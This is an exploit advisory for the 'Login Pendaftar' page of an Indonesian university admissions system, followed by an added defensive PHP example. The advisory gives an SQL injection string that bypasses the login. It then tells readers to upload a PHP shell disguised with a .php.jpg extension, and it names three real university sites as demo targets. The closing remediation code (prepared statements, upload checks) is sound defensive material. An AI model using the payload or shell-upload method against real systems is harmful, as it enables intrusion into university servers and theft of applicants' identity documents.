[+]Exploit Title: SIM PMB Sistem Informasi Mahasiswa Pendaftaran Mahasiswa Baru Bypass SQL Login Pendaftar
[+]Author: Negat1ve
[+]Team: -1
[+]Google Dork: Still Thinking lol :D
[+]Tested on: Windows 10 x64
=======================================
[+]Proof Of Concept:
Find a website with the "Login Pendaftar" login-bypass vulnerability.
How do we know it's vulnerable? It shows this message:
"Untuk melihat hasil test Anda, silahkan login dengan mengisi form di bawah ini."
Log in with these details:
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+
You can upload your shell/script via the Image Uploader, or you can find the KTP/KK/Ijasah Uploader
NB:
- Upload your script with a .php.jpg extension
- I'm just tired of exploring the uploaded path, but I know where :3 Try harder to explore it, happy hacking
Demo sites:
http://pmb.unsada.ac.id/login
http://pmb.unisda.ac.id/login
http://pmb.umg.ac.id/login
Greetz: Electronic Thunderbolt Team - Giant-ps - Anonymous arabe - special for Posit1ve ( my gf )
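
For maintainers of affected installs, an added example (not part of the original advisory and not the application's own code) of how the two weaknesses described above are closed: a login query with bound parameters and a hashed password check, and an upload check that rejects double extensions and non-image content. The table name `pendaftar`, its columns, the function names and the sample account are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added defensive example. Table/column names, function names and the
// sample account are assumptions, not taken from the application.

// Constructed in-memory database standing in for the applicant table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pendaftar (username TEXT PRIMARY KEY, pass_hash TEXT NOT NULL)');
$db->prepare('INSERT INTO pendaftar VALUES (?, ?)')
   ->execute(['budi', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Login: input is bound as data, never concatenated into the SQL text,
// and the password is verified in PHP against the stored hash.
function login(PDO $db, string $user, string $pass): bool
{
    $st = $db->prepare('SELECT pass_hash FROM pendaftar WHERE username = ?');
    $st->execute([$user]);
    $hash = $st->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

// Upload: accept only names of the form "<base>.<image ext>", check the
// content type from the bytes, and store under a server-generated name.
// Returns the storage name, or null when the upload is rejected.
function safeUploadName(string $clientName, string $bytes): ?string
{
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png'];
    $parts = explode('.', strtolower(basename($clientName)));
    if (count($parts) !== 2 || !in_array($parts[1], ['jpg', 'jpeg', 'png'], true)) {
        return null; // double extension such as .php.jpg, or a non-image extension
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    if (!is_string($mime) || !isset($allowed[$mime])) {
        return null; // content is not a JPEG or PNG
    }
    return bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
}

$payload = "' or 1=1 limit 1 -- -+";             // string from the advisory
var_dump(login($db, $payload, $payload));        // treated as a literal user name
var_dump(login($db, 'budi', 'correct horse'));   // legitimate login
$jpeg = "\xFF\xD8\xFF\xE0\x00\x10JFIF\x00\x01";  // constructed JPEG header bytes
var_dump(safeUploadName('foto.php.jpg', $jpeg)); // double extension
var_dump(safeUploadName('foto.jpg', '<?php ?>'));// image name, script content
```

The upload directory should additionally be served with script execution disabled, so that a file that slips through is never interpreted as PHP.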